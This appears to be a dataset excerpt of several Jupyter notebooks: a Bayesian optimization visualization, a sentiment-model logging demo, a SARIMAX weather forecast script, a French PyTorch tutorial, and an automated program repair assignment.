code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
from bayes_opt import BayesianOptimization
from bayes_opt import UtilityFunction
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
# %matplotlib inline
# -
# # Target Function
#
# Lets create a target 1-D function with multiple local maxima to test and visualize how the [BayesianOptimization](https://github.com/fmfn/BayesianOptimization) package works. The target function we will try to maximize is the following:
#
# $$f(x) = e^{-(x - 2)^2} + e^{-\frac{(x - 6)^2}{10}} + \frac{1}{x^2 + 1}, $$ its maximum is at $x = 2$ and we will restrict the interval of interest to $x \in (-2, 10)$.
#
# Notice that, in practice, this function is unknown, the only information we have is obtained by sequentialy probing it at different points. Bayesian Optimization works by contructing a posterior distribution of functions that best fit the data observed and chosing the next probing point by balancing exploration and exploitation.
def target(x):
return np.exp(-(x - 2)**2) + np.exp(-(x - 6)**2/10) + 1/ (x**2 + 1)
# +
x = np.linspace(-2, 10, 10000).reshape(-1, 1)
y = target(x)
plt.plot(x, y);
# -
# # Create a BayesianOptimization Object
#
# Enter the target function to be maximized, its variable(s) and their corresponding ranges. A minimum number of 2 initial guesses is necessary to kick start the algorithms, these can either be random or user defined.
optimizer = BayesianOptimization(target, {'x': (-2, 10)}, random_state=27)
# In this example we will use the Upper Confidence Bound (UCB) as our utility function. It has the free parameter
# $\kappa$ which control the balance between exploration and exploitation; we will set $\kappa=5$ which, in this case, makes the algorithm quite bold.
optimizer.maximize(init_points=2, n_iter=0, kappa=5)
# # Plotting and visualizing the algorithm at each step
# ### Let's first define a couple functions to make plotting easier
# +
def posterior(optimizer, x_obs, y_obs, grid):
optimizer._gp.fit(x_obs, y_obs)
mu, sigma = optimizer._gp.predict(grid, return_std=True)
return mu, sigma
def plot_gp(optimizer, x, y):
fig = plt.figure(figsize=(16, 10))
steps = len(optimizer.space)
fig.suptitle(
'Gaussian Process and Utility Function After {} Steps'.format(steps),
fontdict={'size':30}
)
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
x_obs = np.array([[res["params"]["x"]] for res in optimizer.res])
y_obs = np.array([res["target"] for res in optimizer.res])
mu, sigma = posterior(optimizer, x_obs, y_obs, x)
axis.plot(x, y, linewidth=3, label='Target')
axis.plot(x_obs.flatten(), y_obs, 'D', markersize=8, label=u'Observations', color='r')
axis.plot(x, mu, '--', color='k', label='Prediction')
axis.fill(np.concatenate([x, x[::-1]]),
np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]]),
alpha=.6, fc='c', ec='None', label='95% confidence interval')
axis.set_xlim((-2, 10))
axis.set_ylim((None, None))
axis.set_ylabel('f(x)', fontdict={'size':20})
axis.set_xlabel('x', fontdict={'size':20})
utility_function = UtilityFunction(kind="ucb", kappa=5, xi=0)
utility = utility_function.utility(x, optimizer._gp, 0)
acq.plot(x, utility, label='Utility Function', color='purple')
acq.plot(x[np.argmax(utility)], np.max(utility), '*', markersize=15,
label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((-2, 10))
acq.set_ylim((0, np.max(utility) + 0.5))
acq.set_ylabel('Utility', fontdict={'size':20})
acq.set_xlabel('x', fontdict={'size':20})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
# -
# ### Two random points
#
# After we probe two points at random, we can fit a Gaussian Process and start the bayesian optimization procedure. Two points should give us a uneventful posterior with the uncertainty growing as we go further from the observations.
plot_gp(optimizer, x, y)
# ### After one step of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After two steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After three steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After four steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After five steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After six steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After seven steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# # Stopping
#
# After just a few points the algorithm was able to get pretty close to the true maximum. It is important to notice that the trade off between exploration (exploring the parameter space) and exploitation (probing points near the current known maximum) is fundamental to a succesful bayesian optimization procedure. The utility function being used here (Upper Confidence Bound - UCB) has a free parameter $\kappa$ that allows the user to make the algorithm more or less conservative. Additionally, a the larger the initial set of random points explored, the less likely the algorithm is to get stuck in local minima due to being too conservative.
|
visualization.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <a href="https://colab.research.google.com/github/VertaAI/modeldb/blob/master/client/workflows/demos/distilbert-sentiment-classification.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
import os
os.environ['VERTA_HOST'] =
os.environ['VERTA_EMAIL'] =
os.environ['VERTA_DEV_KEY'] =
# !pip install verta torch transformers
# # Models
from transformers import (
pipeline,
AutoModelForSequenceClassification,
AutoTokenizer,
)
# +
class Model:
MODEL = None
def __init__(self):
self.model = pipeline(
task="sentiment-analysis",
model=AutoModelForSequenceClassification.from_pretrained(self.MODEL),
tokenizer=AutoTokenizer.from_pretrained(self.MODEL),
)
def predict(self, text):
return self.model(text)[0]
class DistilBERT(Model):
MODEL = "distilbert-base-uncased-finetuned-sst-2-english"
def predict(self, text):
sentiment = super(DistilBERT, self).predict(text)
return sentiment
class MultilingualBERT(Model):
MODEL = "nlptown/bert-base-multilingual-uncased-sentiment"
def __init__(self):
super(MultilingualBERT, self).__init__()
self.model.return_all_scores = True # this model has 5 categories, and we'll need to make it 2
def predict(self, text):
scores = super(MultilingualBERT, self).predict(text)
scores = sorted(scores, key=lambda score: score['score'], reverse=True)
sentiment = scores[0]
# fix label
if sentiment['label'].startswith(('1', '2', '3')):
sentiment['label'] = "NEGATIVE"
else: # ('4', '5')
sentiment['label'] = "POSITIVE"
# aggregate score
sentiment['score'] = sum(score['score'] for score in scores[:3])
return sentiment
class BERT(Model):
MODEL = "textattack/bert-base-uncased-imdb"
def predict(self, text):
sentiment = super(BERT, self).predict(text)
# fix label
if sentiment['label'] == "LABEL_0":
sentiment['label'] = "NEGATIVE"
else: # "LABEL_1"
sentiment['label'] = "POSITIVE"
return sentiment
class GermanBERT(Model):
MODEL = "oliverguhr/german-sentiment-bert"
def predict(self, text):
sentiment = super(GermanBERT, self).predict(text)
# fix label
sentiment['label'] = sentiment['label'].upper()
return sentiment
# +
distilbert = DistilBERT()
multilingual_bert = MultilingualBERT()
bert = BERT()
german_bert = GermanBERT()
print(distilbert.predict("I like you"))
print(multilingual_bert.predict("I like you"))
print(bert.predict("I like you"))
print(german_bert.predict("I like you"))
# -
# # Logging Runs
# +
from verta import Client
client = Client()
# -
client.create_project(
"Text Classification",
desc="Models trained for textual sentiment classification.",
tags=["NLP", "Classification", "Q4"],
attrs={'team': "Verta"},
)
# +
client.create_experiment("DistilBERT", tags=["Neural Net"])
run = client.create_experiment_run(
"First DistilBERT",
tags=["DistilBERT", "English"],
)
run.log_model(distilbert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
# +
client.create_experiment("BERT", tags=["Neural Net"])
run = client.create_experiment_run(
"First BERT",
tags=["BERT", "English"],
)
run.log_model(bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
run = client.create_experiment_run(
"Multilingual",
tags=["BERT", "English", "German"],
)
run.log_model(multilingual_bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
run = client.create_experiment_run(
"German",
tags=["BERT", "German"],
)
run.log_model(german_bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
# -
# ---
|
client/workflows/demos/distilbert-sentiment-classification.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from pandas.tseries.offsets import BDay
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
import sklearn as sk
import seaborn as sns
import statsmodels.api as sm
import statsmodels.formula.api as smf
import statsmodels.tsa.api as smt
import itertools
import warnings
import scipy.signal as sp
import math
from statsmodels.tsa.stattools import acf, pacf
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
import datetime
import statistics
from sklearn import linear_model
# +
#build baseline equation
total = pd.concat([demand2016])
total = pd.merge(total,temp,how='inner', left_index=True, right_index=True)
X1 = total.drop(['Total','Toronto'],axis = 1)
Y = total['Total']
clf = linear_model.Lasso(alpha = 0.1) #.LinearRegression()
clf.fit(X1, Y)
print(clf.score(X1,Y))
baseline = clf.coef_[0]*temp['CDD'] + clf.coef_[0]*temp['HDD'] + clf.intercept_
plt.plot(demand2017['2017'])
plt.plot(baseline['2017'])
# -
def convert_datetime(dTot):
dTot['Date_Hour'] = pd.to_datetime(dTot.Date) + pd.to_timedelta(dTot.Hour, unit='h')
dTot = dTot.drop(['Date','Hour'],axis = 1)
dTot = dTot.set_index('Date_Hour')
return dTot
# +
#weather normalize data
#importanting weather data
temp = pd.read_csv("temperature.csv", usecols = [0,26], parse_dates=["datetime"], index_col="datetime")
#convert to degrees celsius
temp = temp - 273.15
#calcualte HDD/CDD
talpha = 14 #temp where correlation between temperature and demand inverts
tbeta = 14
temp['CDD'] = (((temp['Toronto'].resample('D').max()+temp['Toronto'].resample('D').min())/2-talpha))
temp['HDD'] = ((tbeta-(temp['Toronto'].resample('D').max()+temp['Toronto'].resample('D').min())/2))
temp.CDD[temp.CDD < 0] = 0
temp.HDD[temp.HDD < 0] = 0
print(temp['2012-10-02':].resample('D').mean())
# -
#1 day ahead
forecast_length = 1
print(len(demand2017))
def test_model (train, test, i):
#convert by log
#print(train[i])
#print(test[i])
#dTot_train_log = np.log(train[i]) # change
#seasonal differencing
seasons = 12
#dTot_train_log_ewma = dTot_train_log - dTot_train_log.shift(seasons)
#fit model
mod = sm.tsa.statespace.SARIMAX(train[i],
order=(1, 1, 0),
seasonal_order=(0, 0, 0, seasons),
enforce_stationarity=False,
enforce_invertibility=False)
results = mod.fit()
#forecast
forecast = pd.Series(results.get_forecast(steps = forecast_length).predicted_mean, copy = True)
#forecast_log_diff = pd.Series(results.get_forecast(steps = forecast_length).predicted_mean, copy = True)
#forecast_log_diff.index = test[i].index #.resample('D').mean()
#Remove differencing
#forecast_log = forecast_log_diff + dTot_train_log.shift(seasons).iloc[len(train[i])-1] #try mean?
#Remove log
#forecast = pd.Series(np.exp(forecast_log), index=forecast_log.index)
#print(forecast)
#plt.plot(forecast)
#print(forecast)
#plt.plot(test[i])
#print(test[i])
#plt.legend(['Forecast','Test'])
#AIC = results.aic
#RMSE = (forecast - test[i].Total).abs()
#RMSE = math.sqrt((((forecast - test[i].Total)**2).mean()))
#print('AIC:')
#print(AIC)
#print('RMSE:')
#print(RMSE)
#plt.plot(dTot_train_log_ewma)
#Plot auto and partial correlation
#fig = plt.figure(figsize=(12,8))
#ax1 = fig.add_subplot()
#fig = sm.graphics.tsa.plot_acf(dTot_train_log_ewma, lags=40, ax=ax1)
#ax2 = fig.add_subplot()
#fig = sm.graphics.tsa.plot_pacf(dTot_train_log_ewma, lags=40, ax=ax2)
return forecast
# +
#Spilt into train/test
train = []
test = []
results = []
start = 0 #if 1 delete append 2017 in train, remember to change for loop length i.e 260 if 1
ctr = start+forecast_length #forecast_length
train.append(temp['2012-10-02':'2016-12-31'].CDD.resample('D').mean()) #,demand2017.iloc[0:130] summer only
test.append(temp['2017':].CDD.resample('D').mean().iloc[[start]]) #[0:forecast_length]
results.append(test_model(train,test,0))
#int(round(260/forecast_length))
for i in range(1,334): #(1,260) summer only
train.append(train[i-1].append(test[i-1]))
test.append(temp['2017':].CDD.resample('D').mean().iloc[[ctr]])
ctr = ctr + forecast_length
results.append(test_model(train,test,i))
# +
error = []
for i in range(0,334):
error.append((test[i] - results[i]).abs())
r1 = 1
r2 = 364
plt.ylabel('CDD (Celsius)')
plt.xlabel('Day of Year')
plt.title('SARIMA vs. Actual Weather Daily CDD 2017')
plt.plot(results[r1:r2])
plt.plot(test[r1:r2])
plt.legend(['Forecast - 2017','Actual - 2017'])
from sklearn.metrics import mean_squared_error
from math import sqrt
rms = sqrt(mean_squared_error(test[r1:r2], results[r1:r2]))
print(rms)
print(np.mean(error[r1:r2]))
#print(error)
# -
pd.concat(results).to_csv('SARIMAX_CDD_Forecast')
|
SARIMAX_CDD.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# $\newcommand{\xbf}{{\bf x}}
# \newcommand{\ybf}{{\bf y}}
# \newcommand{\wbf}{{\bf w}}
# \newcommand{\Ibf}{\mathbf{I}}
# \newcommand{\Xbf}{\mathbf{X}}
# \newcommand{\Rbb}{\mathbb{R}}
# \newcommand{\vec}[1]{\left[\begin{array}{c}#1\end{array}\right]}
# $
#
# # Introduction à la librairie PyTorch -- Partie 2
# Matériel de cours rédigé par <NAME>, 2019
# ************
# %matplotlib inline
from matplotlib import pyplot as plt
import numpy as np
import aidecours
# ## Le module `torch.nn`
import torch
torch.__version__ # Ce notebook a été conçu avec la version '1.2.0' de pytorch
# Le module `nn` de la librairie `torch` contient plusieurs outils pour construire l'architecture d'un réseau de neurone.
from torch import nn
# Reprenons l'exemple des moindres carrés de la partie précédente, afin de montrer comment exprimer le problème sous la forme d'une réseau de neurones avec les outils qu'offrent *pyTorch*.
# #### Préparation des données
# Préparons les données d'apprentissage sous la forme de *tenseurs pyTorch*.
# +
x = np.array([(1,1),(0,-1),(2,.5)])
y = np.array([-1., 3, 2])
x_tensor = torch.tensor(x, dtype=torch.float32)
y_tensor = torch.tensor(y, dtype=torch.float32)
# -
x_tensor
y_tensor
y_tensor = y_tensor.unsqueeze(1) # Les méthodes du module torch.nn sont conçues pour manipuler des matrices
y_tensor
# #### Couche linéaire
#
# La classe `Linear` correspond à une *couche* linéaire. La méthode des moindres carrés nécessite seulement un neurone de sortie.
# +
# nn.Linear?
# -
neurone = nn.Linear(2, 1, bias=False)
neurone
neurone.weight
neurone(x_tensor)
# #### Fonction de perte
# +
# nn.MSELoss?
# -
perte_quadratique = nn.MSELoss()
perte_quadratique(neurone(x_tensor), y_tensor)
# ## Module d'optimisation `torch.optim`
# +
# torch.optim.SGD?
# +
eta = 0.4
alpha = 0.1
neurone = nn.Linear(2, 1, bias=False)
optimiseur = torch.optim.SGD(neurone.parameters(), lr=eta, momentum=alpha)
for t in range(20):
y_pred = neurone(x_tensor) # Calcul de la sortie de la neurone
loss = perte_quadratique(y_pred, y_tensor) # Calcul de la fonction de perte
loss.backward() # Calcul des gradients
optimiseur.step() # Effectue un pas de la descente de gradient
optimiseur.zero_grad() # Remet à zero les variables du gradient
print(t, loss.item())
# -
# Joignons tout cela ensemble afin de réécrire le module `moindres_carres` avec les outils de *pyTorch*.
class moindres_carres:
def __init__(self, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
# Initialisation des paramètres de la descente en gradient
self.eta = eta # Pas de gradient
self.alpha = alpha # Momentum
self.nb_iter = nb_iter # Nombre d'itérations
self.seed = seed # Germe du générateur de nombres aléatoires
# Initialisation des listes enregistrant la trace de l'algorithme
self.w_list = list()
self.obj_list = list()
def _trace(self, w, obj):
self.w_list.append(np.array(w.squeeze().detach()))
self.obj_list.append(obj.item())
def apprentissage(self, x, y):
if self.seed is not None:
torch.manual_seed(self.seed)
x = torch.tensor(x, dtype=torch.float32)
y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
n, d = x.shape
self.neurone = nn.Linear(d, 1, bias=False)
perte_quadratique = nn.MSELoss()
optimiseur = torch.optim.SGD(self.neurone.parameters(), lr=self.eta, momentum=self.alpha)
for t in range(self.nb_iter + 1):
y_pred = self.neurone(x)
perte = perte_quadratique(y_pred, y)
self._trace(self.neurone.weight, perte)
if t < self.nb_iter:
perte.backward()
optimiseur.step()
optimiseur.zero_grad()
def prediction(self, x):
x = torch.tensor(x, dtype=torch.float32)
with torch.no_grad():
pred = self.neurone(x)
return pred.squeeze().numpy()
# +
eta = 0.4 # taille du pas
alpha = 0.0 # momentum
nb_iter = 20 # nombre d'itérations
algo = moindres_carres(eta, alpha, nb_iter, seed=None)
algo.apprentissage(x, y)
# -
algo.prediction(x)
w_opt = np.linalg.inv(x.T @ x) @ x.T @ y
fig, axes = plt.subplots(1, 2, figsize=(14.5, 4))
fonction_objectif = lambda w: np.mean((x @ w - y) ** 2)
aidecours.show_2d_trajectory(algo.w_list, fonction_objectif, ax=axes[0])
aidecours.show_learning_curve(algo.obj_list, ax=axes[1], obj_opt=fonction_objectif(w_opt))
# ## Ajout d'une couche cachée
couche_cachee = nn.Linear(2, 4)
couche_cachee
couche_cachee.weight
couche_cachee.bias
for variables in couche_cachee.parameters():
print(variables)
print('---')
couche_cachee(x_tensor)
# #### Fonctions d'activations
# Fonction d'activation *ReLU*
# +
# nn.ReLU?
# -
activation_relu = nn.ReLU()
a = torch.linspace(-2, 2, 5)
a
activation_relu(a)
activation_relu(couche_cachee(x_tensor))
# Fonction d'activation *tanh*
# +
# nn.Tanh?
# -
activation_tanh = nn.Tanh()
activation_tanh(a)
activation_tanh(couche_cachee(x_tensor))
# Fonction d'activation *sigmoïdale*
# +
# nn.Sigmoid?
# -
activation_sigmoide = nn.Sigmoid()
activation_sigmoide(a)
activation_sigmoide(couche_cachee(x_tensor))
# #### Succession de couches et de fonctions d'activations
# +
# nn.Sequential?
# -
model = nn.Sequential(
torch.nn.Linear(2, 4),
torch.nn.ReLU(),
)
model(x_tensor)
model = nn.Sequential(
torch.nn.Linear(2, 4),
torch.nn.ReLU(),
torch.nn.Linear(4, 1),
)
model(x_tensor)
for variables in model.parameters():
print(variables)
print('---')
# ## Réseau de neurones à une couche cachée
class reseau_regression:
def __init__(self, nb_neurones=4, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
# Architecture du réseau
self.nb_neurones = nb_neurones # Nombre de neurones sur la couche cachée
# Initialisation des paramètres de la descente en gradient
self.eta = eta # Pas de gradient
self.alpha = alpha # Momentum
self.nb_iter = nb_iter # Nombre d'itérations
self.seed = seed # Germe du générateur de nombres aléatoires
# Initialisation des listes enregistrant la trace de l'algorithme
self.w_list = list()
self.obj_list = list()
def _trace(self, obj):
self.obj_list.append(obj.item())
def apprentissage(self, x, y):
if self.seed is not None:
torch.manual_seed(self.seed)
x = torch.tensor(x, dtype=torch.float32)
y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
n, d = x.shape
self.model = nn.Sequential(
torch.nn.Linear(d, self.nb_neurones),
torch.nn.ReLU(),
torch.nn.Linear(self.nb_neurones, 1)
)
perte_quadratique = nn.MSELoss()
optimiseur = torch.optim.SGD(self.model.parameters(), lr=self.eta, momentum=self.alpha)
for t in range(self.nb_iter + 1):
y_pred = self.model(x)
perte = perte_quadratique(y_pred, y)
self._trace(perte)
if t < self.nb_iter:
perte.backward()
optimiseur.step()
optimiseur.zero_grad()
def prediction(self, x):
x = torch.tensor(x, dtype=torch.float32)
with torch.no_grad():
pred = self.model(x)
return pred.squeeze().numpy()
# +
nb_neurones = 4
eta = 0.1 # taille du pas
alpha = 0.1 # momentum
nb_iter = 50 # nombre d'itérations
x = np.array([(1,1),(0,-1),(2,.5)])
y = np.array([-1., 3, 2])
algo = reseau_regression(nb_neurones, eta, alpha, nb_iter, seed=None)
algo.apprentissage(x, y)
aidecours.show_learning_curve(algo.obj_list)
predictions = algo.prediction(x)
print('y =', y)
print('R(x) =', predictions)
# -
# ## Exercice
# L'objectif de cet exercice est d'adapter la classe `reseau_regression` présentée plus haut pour résoudre le problème de *classification* suivant.
#
#
#
#
from sklearn.datasets import make_circles
xx, yy = make_circles(n_samples=100, noise=.1, factor=0.2, random_state=10)
aidecours.show_2d_dataset(xx, yy)
# Nous vous demandons de compléter la fonction `fit` de la classe `reseau_classification` ci-bas. Nous vous conseillons de vous inspirer de la régression logistique en utilisant une fonction d'activation *sigmoïdale* en sortie, ainsi que la perte du **négatif log vraisemblance**. Il n'est pas nécessaire d'ajouter un terme de régularisation au réseau.
#
# **Notez bien**: La fonction de perte du **négatif log vraisemblance** vue en classe correspond à la classe `nn.BCELoss`
class reseau_classification:
def __init__(self, nb_neurones=4, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
# Architecture du réseau
self.nb_neurones = nb_neurones # Nombre de neurones sur la couche cachée
# Initialisation des paramètres de la descente en gradient
self.eta = eta # Pas de gradient
self.alpha = alpha # Momentum
self.nb_iter = nb_iter # Nombre d'itérations
self.seed = seed # Germe du générateur de nombres aléatoires
# Initialisation des listes enregistrant la trace de l'algorithme
self.w_list = list()
self.obj_list = list()
def _trace(self, obj):
self.obj_list.append(obj.item())
def apprentissage(self, x, y):
if self.seed is not None:
torch.manual_seed(self.seed)
x = torch.tensor(x, dtype=torch.float32)
y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
n, d = x.shape
self.model = nn.Sequential(
torch.nn.Linear(d, self.nb_neurones),
# Compléter l'architecture ici
)
perte_logistique = nn.BCELoss()
optimiseur = torch.optim.SGD(self.model.parameters(), lr=self.eta, momentum=self.alpha)
for t in range(self.nb_iter + 1):
pass # Compléter l'apprentissage ici
def prediction(self, x):
x = torch.tensor(x, dtype=torch.float32)
with torch.no_grad():
pred = self.model(x)
pred = pred.squeeze()
return np.array(pred > .5, dtype=np.int)
# Exécuter le code suivant pour tester votre réseau. Varier les paramètres pour mesurer leur influence.
# +
nb_neurones = 10
eta = 0.6 # taille du pas
alpha = 0.4 # momentum
nb_iter = 50 # nombre d'itérations
algo = reseau_classification(nb_neurones, eta, alpha, nb_iter)
algo.apprentissage(xx, yy)
fig, axes = plt.subplots(1, 2, figsize=(12, 4))
aidecours.show_learning_curve(algo.obj_list, ax=axes[0])
aidecours.show_2d_predictions(xx, yy, algo.prediction, ax=axes[1]);
# -
# Finalement, nous vous suggérons d'explorer le comportement du réseau en:
# 1. Modifiant la fonction d'activation *ReLU* pour une fonction d'activation *tanh*
# 2. Ajoutant une ou plusieurs autres couches cachées
|
td_semaine_2/Intro a pyTorch - Partie 2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "slide"}
# # Third Project - Automated Repair
# + [markdown] slideshow={"slide_type": "slide"}
# ## Overview
# + [markdown] slideshow={"slide_type": "subslide"}
# ### The Task
#
# For the first two submissions we asked you to implement a _Debugger_ as well as an _Input Reducer_. Both of these tools are used to help the developer to locate bugs and then manually fix them.
#
# In this project, you will implement a technique of automatic code repair. To do so, you will extend the `Repairer` introduced in the [Repairing Code Automatically](https://www.debuggingbook.org/beta/html/Repairer.html) chapter of [The Debugging Book](https://www.debuggingbook.org/beta).
#
# Your own `Repairer` should automatically generate _repair suggestions_ to the faulty functions we provide later in this notebook. This can be achieved, for instance, by changing various components of the mutator, changing the debugger, or the reduction algorithm. However, you are neither reguired to make all these changes nor required to limit yourself to the changes proposed here.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### The Submission
#
# The time frame for this project is **3 weeks**, and the deadline is **Februrary 5th, 23:59**.
#
# The submission should be in form of a Jupyter notebook and you are expected to hand in the submission as a .zip-archive. The notebook should, apart from the code itself, also provide sufficient explanations and reasoning (in markdown cells) behind the decisions that lead to the solution provided. Projects that do not include explanations cannot get more than **15 points**.
# + slideshow={"slide_type": "skip"}
import bookutils
# + [markdown] slideshow={"slide_type": "slide"}
# ## A Faulty Function and How to Repair It
# Before discussing how to use and extend the Repairer, we first start by introducing a new (and highly complex) function that is supposed to return the larger of two values.
# + slideshow={"slide_type": "fragment"}
def larger(x, y):
if x < y:
return x
return y
# + [markdown] slideshow={"slide_type": "fragment"}
# Unfortunately, we introduced a bug which makes the function behave the exact opposite way as it is supposed to:
# + slideshow={"slide_type": "fragment"}
larger(1, 3)
# + [markdown] slideshow={"slide_type": "subslide"}
# To fix this issue, we could try to debug it, using the tools we have already seen. However, given the complexity of the function under test (sorry for the irony), we might want to automatically repair the function, using the *Repairer* introduced in *The Debugging Book*.
#
# To do so, we first need to define set of test cases, which help the *Repairer* in fixing the function.
# + slideshow={"slide_type": "fragment"}
def larger_testcase():
x = random.randrange(100)
y = random.randrange(100)
return x, y
# + slideshow={"slide_type": "fragment"}
def larger_test(x, y):
m = larger(x, y)
assert m == max(x, y), f"expected {max(x, y)}, but got {m}"
# + slideshow={"slide_type": "skip"}
import math
import random
# + slideshow={"slide_type": "subslide"}
random.seed(42)
# + [markdown] slideshow={"slide_type": "fragment"}
# Let us generate a random test case for our function:
# + slideshow={"slide_type": "fragment"}
larger_input = larger_testcase()
print(larger_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# and then feed it into our `larger_test()`:
# + slideshow={"slide_type": "skip"}
from ExpectError import ExpectError
# + slideshow={"slide_type": "subslide"}
with ExpectError():
larger_test(*larger_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# As expected, we got an error – the `larger()` function has adefect.
# + [markdown] slideshow={"slide_type": "fragment"}
# For a complete test suite, we need a set of passing and failing tests. To be sure we have both, we create functions which produce dedicated inputs:
# + slideshow={"slide_type": "subslide"}
def larger_passing_testcase():
while True:
try:
x, y = larger_testcase()
_ = larger_test(x, y)
return x, y
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def larger_failing_testcase():
while True:
try:
x, y = larger_testcase()
_ = larger_test(x, y)
except AssertionError:
return x, y
# + slideshow={"slide_type": "subslide"}
passing_input = larger_passing_testcase()
print(passing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# With `passing_input`, our `larger()` function produces a correct result, and its test function does not fail.
# + slideshow={"slide_type": "fragment"}
larger_test(*passing_input)
# + slideshow={"slide_type": "fragment"}
failing_input = larger_failing_testcase()
print(failing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# While `failing_input` leads to an error:
# + slideshow={"slide_type": "subslide"}
with ExpectError():
larger_test(*failing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# With the above defined functions, we can now start to create a number of passing and failing tests:
# + slideshow={"slide_type": "fragment"}
TESTS = 100
# + slideshow={"slide_type": "fragment"}
LARGER_PASSING_TESTCASES = [larger_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "subslide"}
LARGER_FAILING_TESTCASES = [larger_failing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "skip"}
from StatisticalDebugger import OchiaiDebugger
# + [markdown] slideshow={"slide_type": "fragment"}
# Next, let us use _statistical debugging_ to identify likely faulty locations. The `OchiaiDebugger` ranks individual code lines by how frequently they are executed in failing runs (and not in passing runs).
# + slideshow={"slide_type": "fragment"}
larger_debugger = OchiaiDebugger()
# + slideshow={"slide_type": "fragment"}
for x, y in LARGER_PASSING_TESTCASES + LARGER_FAILING_TESTCASES:
with larger_debugger:
m = larger_test(x, y)
# + [markdown] slideshow={"slide_type": "fragment"}
# Given the results of statistical debugging, we can now use the *Repairer* introduced in the book to repair our function. Here we use the default implementation which is initialized with the simple _StatementMutator_ mutator.
# + slideshow={"slide_type": "skip"}
from Repairer import Repairer
from Repairer import ConditionMutator, CrossoverOperator
from Repairer import DeltaDebugger
# + slideshow={"slide_type": "subslide"}
repairer = Repairer(larger_debugger, log=True)
# + slideshow={"slide_type": "subslide"}
best_tree, fitness = repairer.repair() # type: ignore
# + [markdown] slideshow={"slide_type": "subslide"}
# The *Repairer* successfully produced a fix.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Implementation
#
# As stated above, the goal of this project is to implement a repairer capable of producing a fix to the functions defined in *the Evaluation section*, as well as secret functions.
# To do this, you need to work with the _Repairer_ class from the book.
# The _Repairer_ class is very configurable, so that it is easy to update and plug in various components: the fault localization (pass a different debugger that is a subclass of DifferenceDebugger), the mutation operator (set mutator_class to a subclass of `StatementMutator`), the crossover operator (set crossover_class to a subclass of `CrossoverOperator`), and the reduction algorithm (set reducer_class to a subclass of `Reducer`). You may change any of these components or make other changes at will.
# + [markdown] slideshow={"slide_type": "subslide"}
# For us to be able to test your implementation, you will have to implement the `debug_and_repair()` function defined here.
# + slideshow={"slide_type": "skip"}
import astor
# + slideshow={"slide_type": "skip"}
from bookutils import print_content, show_ast
# + slideshow={"slide_type": "subslide"}
def debug_and_repair(f, testcases, test_function, log=False):
'''
Debugs a function with the given testcases and the test_function
and tries to repair it afterwards.
Parameters
----------
f : function
The faulty function, to be debugged and repaired
testcases : List
A list that includes test inputs for the function under test
test_function : function
A function that takes the test inputs and tests whether the
function under test produces the correct output.
log: bool
Turn logging on/off.
Returns
-------
str
The repaired version of f as a string.
'''
# TODO: implement this function
return None
# + [markdown] slideshow={"slide_type": "subslide"}
